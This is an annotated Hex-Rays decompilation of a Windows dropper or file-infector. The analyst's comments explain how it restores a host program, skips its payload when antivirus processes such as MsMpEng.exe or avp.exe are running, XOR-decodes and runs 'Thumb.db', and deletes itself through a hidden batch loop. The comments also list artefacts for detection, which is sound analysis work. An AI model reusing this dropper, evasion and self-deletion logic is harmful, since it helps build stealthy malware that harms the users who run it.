/* This file has been generated by the Hex-Rays decompiler.
   Copyright (c) 2009 Hex-Rays <[email protected]>
   Detected compiler: Visual C++
*/
#include <windows.h>
#include <defs.h>
//-------------------------------------------------------------------------
// Data declarations
//
// Naming follows IDA/Hex-Rays conventions: sub_XXXXXX are unnamed functions,
// off_XXXXXX are pointers into data (here apparently MFC vtables / runtime
// tables) and aXxx are string literals named after their text. ProcessExists
// and Install_Virus are not auto-generated names and were presumably assigned
// by the analyst. The string externs below appear to match the literals that
// show up inline in the function bodies (e.g. aDelFQ0 ~ "del /f /q %0",
// aFshoster32_exe ~ "fshoster32.exe"); none of them is referenced by name in
// this listing.

// extern void *CDialog__messageMap; weak
// extern void *CWinApp__messageMap; weak
extern int (*off_402220)(); // weak
extern int (*off_402300)(); // weak
extern int (*off_402350)(); // weak
extern char Operation[]; // idb
extern char aDelFQ0[]; // idb
extern char aIfExistSGotoSt[]; // idb
extern char aDelFQS[]; // idb
extern char aStart[]; // idb
extern char Mode[]; // idb
extern char Format[]; // idb
extern char aWb[]; // idb
extern char aRb[]; // idb
extern char FileName[]; // idb
extern char ApplicationName[]; // idb
extern char aFshoster32_exe[]; // idb
extern char aFprottray_exe[]; // idb
extern char aBdagent_exe[]; // idb
extern char aAvp_exe[]; // idb
extern char aMsmpeng_exe[]; // idb
extern char String1[]; // idb
extern char aBak[]; // idb
extern char String2[]; // idb

//-------------------------------------------------------------------------
// Function declarations
//
// Reader's index, derived from the bodies further down (the binary itself
// carries no symbols):
//   sub_401000 / sub_401010 / sub_401040  CWinApp-derived application object:
//                                         message map, runtime table, deleting dtor
//   sub_4010B0                            constructs the dialog, runs it modally,
//                                         returns 0
//   sub_401150 .. sub_401210              the dialog: ctor, dtor, message map,
//                                         runtime table, OnInitDialog (calls
//                                         Install_Virus)
//   sub_401330 / sub_401340               disable / enable a window
//   sub_401350                            file-existence probe (CreateFileA)
//   sub_401390                            writes and runs a self-deleting .bat in
//                                         %WINDIR%\temp
//   sub_4014B0                            byte-wise XOR copy of a file (payload
//                                         decoder)
//   ProcessExists                         finds a process by image name (Toolhelp32)
//   Install_Virus                         main routine: restores and runs the .bak
//                                         host, decodes and runs Thumb.db when none
//                                         of the listed processes is running
//   sub_401C22, sub_401CB0 .. SEH_401150  a stub and C++ exception-handling funclets
// sub_401350 and ProcessExists are declared `int` here and defined `signed int`
// below; in C those are the same type.

#define __thiscall __cdecl // Test compile in C mode
// Hex-Rays marks MFC methods __thiscall; with this define `this` becomes an
// ordinary first parameter so the listing can be fed to a C compiler.

void *__cdecl sub_401000();
int (**__cdecl sub_401010())();
void *__thiscall sub_401040(void *this, char a2);
int CWinApp___CWinApp(void); // weak
int __thiscall sub_4010B0(void *this);
int __thiscall CDialog___CDialog(_DWORD); // weak
void *__thiscall sub_401150(void *this, int a2);
void *__thiscall sub_4011C0(void *this, char a2);
void *__cdecl sub_4011F0();
int (**__cdecl sub_401200())();
signed int __thiscall sub_401210(void *this);
BOOL __thiscall sub_401330(int this);
BOOL __thiscall sub_401340(int this);
int __cdecl sub_401350(LPCSTR lpFileName); // idb
void *__cdecl sub_401390(int a1);
signed int __cdecl sub_4014B0(const char *Filename, const char *a2, char a3);
int __cdecl ProcessExists(LPCSTR lpString1); // idb
void *__cdecl Install_Virus();
// void __cdecl operator delete(void *); idb
// int __thiscall CDialog___CDialog(_DWORD); weak
// int __thiscall CDialog__DoModal(_DWORD); weak
// int __thiscall CDialog__OnOK(_DWORD); weak
// struct HINSTANCE__ *__stdcall AfxFindResourceHandle(const char *, const char *); idb
// int AfxGetModuleState(void); weak
// int __stdcall CDialog__CDialog(_DWORD, _DWORD); weak
// int CDialog__OnInitDialog(void); weak
// int _CxxFrameHandler(void); weak
int __cdecl sub_401C22();
// BOOL __stdcall Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
// BOOL __stdcall Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
// HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
// int __stdcall AfxWinMain(struct HINSTANCE__ *, struct HINSTANCE__ *, char *, int); idb
// int __usercall sub_401CB0<eax>(int a1<ebp>);
int __cdecl SEH_4010B0();
// int __usercall sub_401CD0<eax>(int a1<ebp>);
int __cdecl SEH_401150();
// BOOL __stdcall CloseHandle(HANDLE hObject);
// HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// LPSTR __stdcall lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
// UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize);
// UINT __stdcall SetErrorMode(UINT uMode);
// int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2);
// BOOL __stdcall DeleteFileA(LPCSTR lpFileName);
// BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
// LPSTR __stdcall GetCommandLineA();
// void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo);
// BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
// LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2);
// int __stdcall lstrlenA(LPCSTR lpString);
// DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize);
// DWORD __stdcall GetLastError();
// _DWORD __stdcall AfxWinMain(struct HINSTANCE__ *, struct HINSTANCE__ *, char *, int); weak
// size_t __cdecl fread(void *DstBuf, size_t ElementSize, size_t Count, FILE *File);
// size_t __cdecl fwrite(const void *Str, size_t Size, size_t Count, FILE *File);
// int sprintf(char *Dest, const char *Format, ...);
// FILE *__cdecl fopen(const char *Filename, const char *Mode);
// int fprintf(FILE *File, const char *Format, ...);
// int __cdecl fclose(FILE *File);
// HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
// BOOL __stdcall EnableWindow(HWND hWnd, BOOL bEnable);
// HICON __stdcall LoadIconA(HINSTANCE hInstance, LPCSTR lpIconName);
// LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
//----- (00401000) --------------------------------------------------------
// Returns the address of the application object's message map; by shape this
// is the MFC GetMessageMap() override of the CWinApp-derived class (cannot be
// confirmed from the listing alone). Pure accessor, no side effects.
void *__cdecl sub_401000()
{
  return CWinApp__messageMap;
}
// 402184: using guessed type void *CWinApp__messageMap;
//----- (00401010) --------------------------------------------------------
// Returns a pointer to the function-pointer table at off_402220. The return
// type is a decompiler guess; given the surrounding MFC code this is most
// likely the application class's GetRuntimeClass() (to be confirmed).
int (**__cdecl sub_401010())()
{
  return &off_402220;
}
// 402220: using guessed type int (*off_402220)();
//----- (00401040) --------------------------------------------------------
// Deleting destructor of the CWinApp-derived application object: runs the
// base destructor CWinApp::~CWinApp and, when bit 0 of a2 is set, frees the
// object with operator delete. This matches the MSVC "scalar deleting
// destructor" shape (a2 is the compiler's delete flag).
//
// this : the object being destroyed
// a2   : flags; bit 0 = also release the storage
// returns this (a dangling pointer once it has been deleted)
void *__thiscall sub_401040(void *this, char a2)
{
  void *v2; // esi@1

  v2 = this;
  CWinApp___CWinApp();
  if ( a2 & 1 )
    operator delete(v2);
  return v2;
}
// 401060: using guessed type int CWinApp___CWinApp(void);
//----- (004010B0) --------------------------------------------------------
// Application-object method, by shape CWinApp::InitInstance: builds the main
// dialog (sub_401150) on the stack, publishes its address at this+32 (likely
// CWinThread::m_pMainWnd - not confirmable here), runs it modally, destroys
// it and returns 0. In MFC a 0 from InitInstance ends the program without a
// message loop, so the whole run is: show dialog, dialog closes itself, exit.
// Note that the dialog's OnInitDialog (sub_401210, judging by its calls) runs
// Install_Virus and then OnOK, so no user interaction is needed.
//
// v3 is the dialog object (about 0x6C bytes of stack, typed as a char by the
// decompiler); v4 looks like the compiler's exception-state counter
// (0 = dialog constructed, -1 = destroyed) consumed by the unwind funclet
// sub_401CB0 / SEH_4010B0.
// returns 0
int __thiscall sub_4010B0(void *this)
{
  void *v2; // esi@1
  char v3; // [sp+4h] [bp-70h]@1
  int v4; // [sp+70h] [bp-4h]@1

  v2 = this;
  sub_401150(&v3, 0); // dialog ctor, no parent window
  v4 = 0;
  *((_DWORD *)v2 + 8) = &v3;
  CDialog__DoModal(&v3); // blocks until the dialog ends itself
  v4 = -1;
  CDialog___CDialog(&v3);
  return 0;
}
// 40196A: using guessed type int __thiscall CDialog___CDialog(_DWORD);
// 401970: using guessed type int __thiscall CDialog__DoModal(_DWORD);
//----- (00401150) --------------------------------------------------------
// Constructor of the main dialog: CDialog::CDialog(IDD = 102, pParentWnd = a2),
// installs the vtable off_402350, then loads icon resource 128 (0x80) from
// the module that owns RT_GROUP_ICON (0xE) 128 and stores the HICON at
// this+96. sub_401210 later reads the same slot to set the window icons.
//
// this : raw storage for the dialog object
// a2   : parent window (the only visible caller passes 0)
// returns this
void *__thiscall sub_401150(void *this, int a2)
{
  void *v3; // esi@1
  HINSTANCE v4; // eax@1

  v3 = this;
  CDialog__CDialog(102, a2);
  *(_DWORD *)v3 = &off_402350; // vtable of the derived dialog class
  AfxGetModuleState();
  // MAKEINTRESOURCE(128) of type RT_GROUP_ICON (14)
  v4 = AfxFindResourceHandle((const char *)0x80, (const char *)0xE);
  *((_DWORD *)v3 + 24) = LoadIconA(v4, (LPCSTR)0x80);
  return v3;
}
// 401A30: using guessed type int AfxGetModuleState(void);
// 401A36: using guessed type int __stdcall CDialog__CDialog(_DWORD, _DWORD);
// 402350: using guessed type int (*off_402350)();
//----- (004011C0) --------------------------------------------------------
// Deleting destructor of the dialog class: runs CDialog::~CDialog and, when
// bit 0 of a2 is set, frees the object (MSVC scalar deleting destructor
// shape; a2 is the compiler's delete flag).
//
// returns this (dangling once deleted)
void *__thiscall sub_4011C0(void *this, char a2)
{
  void *v2; // esi@1

  v2 = this;
  CDialog___CDialog(this);
  if ( a2 & 1 )
    operator delete(v2);
  return v2;
}
// 401120: using guessed type int __thiscall CDialog___CDialog(_DWORD);
//----- (004011F0) --------------------------------------------------------
// Returns the address of the dialog's message map (by shape the MFC
// GetMessageMap() override of the dialog class). Pure accessor.
void *__cdecl sub_4011F0()
{
  return CDialog__messageMap;
}
// 40212C: using guessed type void *CDialog__messageMap;
//----- (00401200) --------------------------------------------------------
// Returns a pointer to the table at off_402300; the counterpart of
// sub_401010 for the dialog class (probably its GetRuntimeClass(); the
// return type is a decompiler guess).
int (**__cdecl sub_401200())()
{
  return &off_402300;
}
// 402300: using guessed type int (*off_402300)();
//----- (00401210) --------------------------------------------------------
// OnInitDialog override of the main dialog. Sets the window's big and small
// icons, then runs the whole payload (Install_Virus) and ends the dialog at
// once with OnOK - the window is closed as soon as it has been initialised,
// after the real work has already happened. This is the single entry point
// into the malicious logic in this listing.
//
// this+32 is read as the window handle (probably CWnd::m_hWnd); this+96 is
// the HICON stored by the constructor sub_401150 at the same offset.
// returns 1 (the usual TRUE result of OnInitDialog)
signed int __thiscall sub_401210(void *this)
{
  void *v2; // esi@1

  v2 = this;
  CDialog__OnInitDialog();
  // WM_SETICON (0x80 == 128) with ICON_BIG (1), then ICON_SMALL (0).
  SendMessageA(*((HWND *)v2 + 8), 128u, 1u, *((_DWORD *)v2 + 24));
  SendMessageA(*((HWND *)v2 + 8), 0x80u, 0, *((_DWORD *)v2 + 24));
  Install_Virus(); // payload runs here, during dialog initialisation
  CDialog__OnOK(v2); // closes the dialog immediately afterwards
  return 1;
}
// 401982: using guessed type int __thiscall CDialog__OnOK(_DWORD);
// 401A3C: using guessed type int CDialog__OnInitDialog(void);
//----- (00401330) --------------------------------------------------------
// Disables the window whose HWND is at this+32 (probably CWnd::m_hWnd).
// Likely a message-map handler; no caller is visible in this listing.
// returns EnableWindow's result (previous enabled state)
BOOL __thiscall sub_401330(int this)
{
  return EnableWindow(*(HWND *)(this + 32), 0);
}
//----- (00401340) --------------------------------------------------------
// Enables the window whose HWND is at this+32 (probably CWnd::m_hWnd);
// the counterpart of sub_401330. No caller is visible in this listing.
// returns EnableWindow's result (previous enabled state)
BOOL __thiscall sub_401340(int this)
{
  return EnableWindow(*(HWND *)(this + 32), 1);
}
//----- (00401350) --------------------------------------------------------
// File-existence probe: tries to open lpFileName for reading and reports
// 1 when it exists, 0 when CreateFileA fails with ERROR_FILE_NOT_FOUND (2).
//
// Two things to know before treating this as a reliable "exists" test:
//  - Any other failure (access denied, path not found, sharing violation)
//    also yields 1, because only error 2 is distinguished.
//  - In that case CloseHandle is called on INVALID_HANDLE_VALUE.
// sub_401390 loops while this returns 1, so those errors turn into an
// endless loop there.
//
// lpFileName : path to test
// returns 1 (exists / other error), 0 (does not exist)
signed int __cdecl sub_401350(LPCSTR lpFileName)
{
  HANDLE v1; // esi@1
  signed int result; // eax@3

  // GENERIC_READ (0x80000000), FILE_SHARE_READ (1), OPEN_EXISTING (3)
  v1 = CreateFileA(lpFileName, 0x80000000u, 1u, 0, 3u, 0, 0);
  if ( v1 != (HANDLE)-1 || GetLastError() != 2 )
  {
    CloseHandle(v1); // may receive INVALID_HANDLE_VALUE (see header note)
    result = 1;
  }
  else
  {
    result = 0;
  }
  return result;
}
//----- (00401390) --------------------------------------------------------
// Writes a small batch script into %WINDIR%\temp and launches it through the
// shell, so that the file named by a1 is removed once this process has exited
// (the script keeps retrying until the file is gone, then deletes itself).
//
// a1      : C string with the full path to delete (typed as int by the
//           decompiler; the only visible caller, Install_Virus, passes the
//           path of its own renamed image).
// returns : the HINSTANCE from ShellExecuteA, or NULL if the script could not
//           be created. The caller does not check it.
//
// On-disk artefact for detection: %WINDIR%\temp\temp<N>.bat, N = first index
// from 0 whose name is free, containing exactly these four lines:
//   :start
//   del /f /q "<a1>"
//   if exist "<a1>" goto start
//   del /f /q %0
// plus a cmd.exe child (normally the "open" handler for .bat) spawned by this
// process with that script as argument.
void *__cdecl sub_401390(int a1)
{
  int v1; // esi@1
  int v2; // ST18_4@2
  void *result; // eax@3
  FILE *v4; // esi@3
  // The decompiler split two 260-byte (MAX_PATH) stack buffers into pieces:
  // File..v8 form one buffer at [bp-208h], String2..v12 another at [bp-104h].
  CHAR File; // [sp+8h] [bp-208h]@1
  char v6; // [sp+9h] [bp-207h]@1
  __int16 v7; // [sp+109h] [bp-107h]@1
  char v8; // [sp+10Bh] [bp-105h]@1
  CHAR String2; // [sp+10Ch] [bp-104h]@1
  char v10; // [sp+10Dh] [bp-103h]@1
  __int16 v11; // [sp+20Dh] [bp-3h]@1
  char v12; // [sp+20Fh] [bp-1h]@1

  // Zero both buffers piecewise (compiler-expanded clearing of 260 bytes each).
  String2 = 0;
  memset(&v10, 0, 0x100u);
  v11 = 0;
  v12 = 0;
  File = 0;
  memset(&v6, 0, 0x100u);
  v7 = 0;
  v1 = 0;
  v8 = 0;
  SetErrorMode(1u); // SEM_FAILCRITICALERRORS: no critical-error message boxes
  GetWindowsDirectoryA(&String2, 0x104u); // 0x104 = MAX_PATH
  lstrcpyA(&File, &String2); // dead store: overwritten by sprintf below
  // Pick the first temp<N>.bat that does not exist yet. sub_401350 returns 1
  // for any CreateFileA failure other than ERROR_FILE_NOT_FOUND, so if
  // %WINDIR%\temp is missing or inaccessible this loop never terminates.
  // sprintf is unbounded and File holds 260 bytes, so a Windows directory
  // path close to MAX_PATH would overflow it.
  do
  {
    v2 = v1++;
    sprintf(&File, "%s\\temp\\temp%d.bat", &String2, v2);
  }
  while ( sub_401350(&File) );
  // L"w" is a decompiler typing artefact; the binary presumably passes a
  // narrow "w" (fopen takes char *).
  result = fopen(&File, L"w");
  v4 = (FILE *)result;
  if ( result )
  {
    // fprintf called through a cast with no varargs; same effect as
    // fprintf(v4, ":start\r\n").
    ((void (__cdecl *)(void *, _DWORD))fprintf)(result, ":start\r\n");
    fprintf(v4, "del /f /q \"%s\"\r\n", a1);
    fprintf(v4, "if exist \"%s\" goto start\r\n", a1); // loop until the file is unlocked and gone
    fprintf(v4, "del /f /q %%0\r\n"); // the script removes itself last
    fclose(v4);
    // Shell "open" verb on the .bat; nShowCmd 0 == SW_HIDE.
    result = ShellExecuteA(0, "open", &File, 0, 0, 0);
  }
  return result;
}
//----- (004014B0) --------------------------------------------------------
// Copies Filename to a2, XOR-ing every byte with the single-byte key a3.
// Install_Virus uses it to turn the dropped "Thumb.db" into the executable
// "Thumb.db.tmp" with key -86 (0xAA). XOR is its own inverse, so an analyst
// holding a captured Thumb.db can recover the payload with the same
// transform.
//
// Filename : input file (opened "rb")
// a2       : output file (opened "wb", truncated)
// a3       : key applied to every byte
// returns 1 on completion, 0 if either file cannot be opened. fwrite's
// result is not checked, so a short write is still reported as success, and
// fread's 0 does not distinguish EOF from a read error.
signed int __cdecl sub_4014B0(const char *Filename, const char *a2, char a3)
{
  FILE *v3; // esi@1
  FILE *v4; // ebx@2
  size_t i; // eax@3
  signed int j; // ecx@4
  char DstBuf[1024]; // [sp+Ch] [bp-400h]@3

  v3 = fopen(Filename, "rb");
  if ( !v3 )
    return 0;
  v4 = fopen(a2, "wb");
  if ( !v4 )
  {
    fclose(v3); // do not leak the input handle on the early return
    return 0;
  }
  memset(DstBuf, 0, sizeof(DstBuf));
  // Process in 1 KiB chunks until fread returns 0.
  for ( i = fread(DstBuf, 1u, 0x400u, v3); i; i = fread(DstBuf, 1u, 0x400u, v3) )
  {
    for ( j = 0; j < (signed int)i; ++j )
      DstBuf[j] ^= a3;
    fwrite(DstBuf, i, 1u, v4); // one element of i bytes; unchecked
    memset(DstBuf, 0, sizeof(DstBuf)); // redundant: the next fread overwrites what it uses
  }
  fclose(v3);
  fclose(v4);
  return 1;
}
// 4014B0: using guessed type char DstBuf[1024];
//----- (004015A0) --------------------------------------------------------
// Looks for a running process whose image name equals lpString1
// (case-insensitive, lstrcmpiA) by walking a Toolhelp32 process snapshot.
//
// lpString1 : image name to look for, e.g. "avp.exe" (no path)
// returns the PID of the first match, or -1 when nothing matches or the
// snapshot cannot be taken. Callers in this listing only test for -1.
//
// Quirks worth knowing before reusing this as a reference:
//  - CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE, not
//    NULL, so the `if ( v2 )` guard does not catch it; Process32First then
//    fails and CloseHandle(INVALID_HANDLE_VALUE) is called. The result is
//    still -1, so the else branch is effectively dead.
//  - v1 is a DWORD returned through a signed int; a PID >= 0x80000000 would
//    come back negative (not reachable in practice).
signed int __cdecl ProcessExists(LPCSTR lpString1)
{
  DWORD v1; // ebp@1
  HANDLE v2; // esi@1
  signed int result; // eax@7
  PROCESSENTRY32 pe; // [sp+8h] [bp-128h]@1

  v1 = -1;
  pe.dwSize = 296; // sizeof(PROCESSENTRY32), 32-bit ANSI layout
  v2 = CreateToolhelp32Snapshot(2u, 0); // TH32CS_SNAPPROCESS, all processes
  if ( v2 )
  {
    if ( Process32First(v2, &pe) )
    {
      if ( lstrcmpiA(lpString1, pe.szExeFile) )
      {
        // First entry did not match: scan the rest.
        while ( Process32Next(v2, &pe) )
        {
          if ( !lstrcmpiA(lpString1, pe.szExeFile) )
            goto LABEL_6;
        }
      }
      else
      {
LABEL_6:
        v1 = pe.th32ProcessID;
      }
    }
    CloseHandle(v2);
    result = v1;
  }
  else
  {
    result = -1;
  }
  return result;
}
//----- (00401630) --------------------------------------------------------
// Main routine, reached from the dialog's OnInitDialog (sub_401210). From the
// calls visible here it does, in order:
//  1. Reads its own image path (String2).
//  2. Renames that image to "<own dir>\tmp.tmp" (String) with MoveFileA.
//  3. Renames "<own path minus extension>.bak" (ExistingFileName) to the
//     original image path and starts it with this process's command line, so
//     the user gets the program they launched. The .bak is presumably a host
//     executable set aside earlier; its creation is not in this file.
//  4. If none of six named processes is running (the names look like
//     antivirus components), XOR-decodes "Thumb.db" with key -86 (0xAA) into
//     "Thumb.db.tmp" (sub_4014B0) and starts it. Both names are relative to
//     the current directory, so the outcome depends on how the program was
//     launched.
//  5. Deletes "Thumb.db" and hands "<own dir>\tmp.tmp" (its own renamed
//     image) to sub_401390 for deferred deletion via a batch file.
// None of the MoveFileA / CreateProcessA results is checked, and the process
// and thread handles returned in ProcessInformation are never closed.
// returns the value of sub_401390 (ShellExecuteA result or NULL).
//
// Host artefacts a defender can look for: "tmp.tmp" beside the launched
// program, "Thumb.db.tmp" in its working directory, a ".bak" being renamed
// over an ".exe", and the %WINDIR%\temp\temp<N>.bat described at sub_401390.
void *__cdecl Install_Virus()
{
  int v0; // eax@1
  int v1; // eax@6
  CHAR *v2; // eax@11
  struct _PROCESS_INFORMATION ProcessInformation; // [sp+10h] [bp-360h]@11
  struct _STARTUPINFOA StartupInfo; // [sp+20h] [bp-350h]@11
  // Three 260-byte (MAX_PATH) buffers split by the decompiler, per the stack
  // offsets: String+v7 at [bp-30Ch], ExistingFileName+v9 at [bp-208h],
  // String2+v11+v12+v13 at [bp-104h]. Hence v7[k] is String[k+1] and v9[k]
  // is ExistingFileName[k+1].
  CHAR String; // [sp+64h] [bp-30Ch]@1
  char v7[259]; // [sp+65h] [bp-30Bh]@1
  CHAR ExistingFileName; // [sp+168h] [bp-208h]@1
  char v9[259]; // [sp+169h] [bp-207h]@1
  CHAR String2; // [sp+26Ch] [bp-104h]@1
  char v11; // [sp+26Dh] [bp-103h]@1
  __int16 v12; // [sp+36Dh] [bp-3h]@1
  char v13; // [sp+36Fh] [bp-1h]@1

  // Zero all three buffers piecewise.
  String2 = 0;
  String = 0;
  memset(&v11, 0, 0x100u);
  v12 = 0;
  v13 = 0;
  ExistingFileName = 0;
  memset(v7, 0, 0x100u);
  *(_WORD *)&v7[256] = 0;
  v7[258] = 0;
  memset(v9, 0, 0x100u);
  *(_WORD *)&v9[256] = 0;
  v9[258] = 0;
  GetModuleFileNameA(0, &String2, 0x104u); // own full path; 0x104 = MAX_PATH
  lstrcpyA(&String, &String2);
  lstrcpyA(&ExistingFileName, &String2);
  // Cut String just after the last '\' (92): v7[v0] == String[v0 + 1].
  // With no backslash the path is left whole and "tmp.tmp" is appended to it.
  v0 = lstrlenA(&String) - 1;
  if ( v0 >= 0 )
  {
    while ( *(&String + v0) != 92 )
    {
      --v0;
      if ( v0 < 0 )
        goto LABEL_6;
    }
    v7[v0] = 0;
  }
LABEL_6:
  lstrcatA(&String, "tmp.tmp");
  MoveFileA(&String2, &String); // own (running) image -> <dir>\tmp.tmp; unchecked
  // Cut ExistingFileName just after the last '.' (46): v9[v1] == ExistingFileName[v1 + 1].
  v1 = lstrlenA(&ExistingFileName) - 1;
  if ( v1 >= 0 )
  {
    while ( *(&ExistingFileName + v1) != 46 )
    {
      --v1;
      if ( v1 < 0 )
        goto LABEL_11;
    }
    v9[v1] = 0;
  }
LABEL_11:
  lstrcatA(&ExistingFileName, "bak");
  MoveFileA(&ExistingFileName, &String2); // <name>.bak -> original image path; unchecked
  // Clear STARTUPINFOA (cb plus the 0x40 bytes after it) and
  // PROCESS_INFORMATION, then start the restored program with this
  // process's own command line so the launch looks like the user's.
  StartupInfo.cb = 0;
  memset(&StartupInfo.lpReserved, 0, 0x40u);
  ProcessInformation.hThread = 0;
  ProcessInformation.hProcess = 0;
  ProcessInformation.dwProcessId = 0;
  ProcessInformation.dwThreadId = 0;
  GetStartupInfoA(&StartupInfo);
  v2 = GetCommandLineA();
  CreateProcessA(&String2, v2, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation); // unchecked; handles leaked
  // Payload stage only when none of these processes is present (each
  // ProcessExists call returns -1 for "not running"). The nesting stops at
  // the first one found.
  if ( ProcessExists("ccsvchst.exe") == -1 )
  {
    if ( ProcessExists("MsMpEng.exe") == -1 )
    {
      if ( ProcessExists("avp.exe") == -1 )
      {
        if ( ProcessExists("bdagent.exe") == -1 )
        {
          if ( ProcessExists("FProtTray.exe") == -1 )
          {
            if ( ProcessExists("fshoster32.exe") == -1 )
            {
              GetStartupInfoA(&StartupInfo);
              // -86 == (char)0xAA: single-byte XOR key for the dropped payload.
              if ( sub_4014B0("Thumb.db", "Thumb.db.tmp", -86) )
                CreateProcessA("Thumb.db.tmp", 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation); // relative path, CWD-dependent; unchecked
            }
          }
        }
      }
    }
  }
  DeleteFileA("Thumb.db"); // encoded payload removed whether or not it was used
  return sub_401390((int)&String); // deferred self-delete of <dir>\tmp.tmp
}
// 401630: using guessed type char var_30B[259];
// 401630: using guessed type char var_207[259];
//----- (00401C22) --------------------------------------------------------
// Stub that returns 0. Its purpose is not recoverable from this listing (no
// caller is visible; possibly a compiler- or framework-generated helper).
int __cdecl sub_401C22()
{
  return 0;
}
//----- (00401CB0) --------------------------------------------------------
// C++ exception-unwind funclet: destroys the dialog object at [ebp-112]. The
// offset matches v3 at [bp-70h] (0x70 == 112) in sub_4010B0, so this is the
// cleanup for that function's stack dialog, dispatched via SEH_4010B0.
// `__usercall ... <eax>(int a1<ebp>)` is Hex-Rays notation for a routine
// taking its argument in ebp; it is not valid C.
int __usercall sub_401CB0<eax>(int a1<ebp>)
{
  return CDialog___CDialog(a1 - 112);
}
// 401120: using guessed type int __thiscall CDialog___CDialog(_DWORD);
//----- (00401CB8) --------------------------------------------------------
// Exception-handler thunk registered for sub_4010B0: forwards to the CRT's
// C++ frame handler (_CxxFrameHandler), which runs sub_401CB0 when the
// dialog object needs to be unwound.
int __cdecl SEH_4010B0()
{
  return _CxxFrameHandler();
}
// 401A92: using guessed type int _CxxFrameHandler(void);
//----- (00401CD0) --------------------------------------------------------
// C++ exception-unwind funclet: destroys the CDialog whose pointer is saved at
// [ebp-16]. By position and by the name of the following thunk (SEH_401150)
// this belongs to the constructor sub_401150, but that function's listed
// locals do not show a [bp-10h] slot, so the exact object cannot be confirmed
// here. `__usercall ... <ebp>` is Hex-Rays notation, not valid C.
int __usercall sub_401CD0<eax>(int a1<ebp>)
{
  return CDialog___CDialog(*(_DWORD *)(a1 - 16));
}
// 40196A: using guessed type int __thiscall CDialog___CDialog(_DWORD);
//----- (00401CD8) --------------------------------------------------------
// Exception-handler thunk registered for sub_401150: forwards to the CRT's
// C++ frame handler (_CxxFrameHandler); sub_401CD0 is the matching unwind
// funclet.
int __cdecl SEH_401150()
{
  return _CxxFrameHandler();
}
// 401A92: using guessed type int _CxxFrameHandler(void);
// ALL OK, 21 function(s) have been successfully decompiled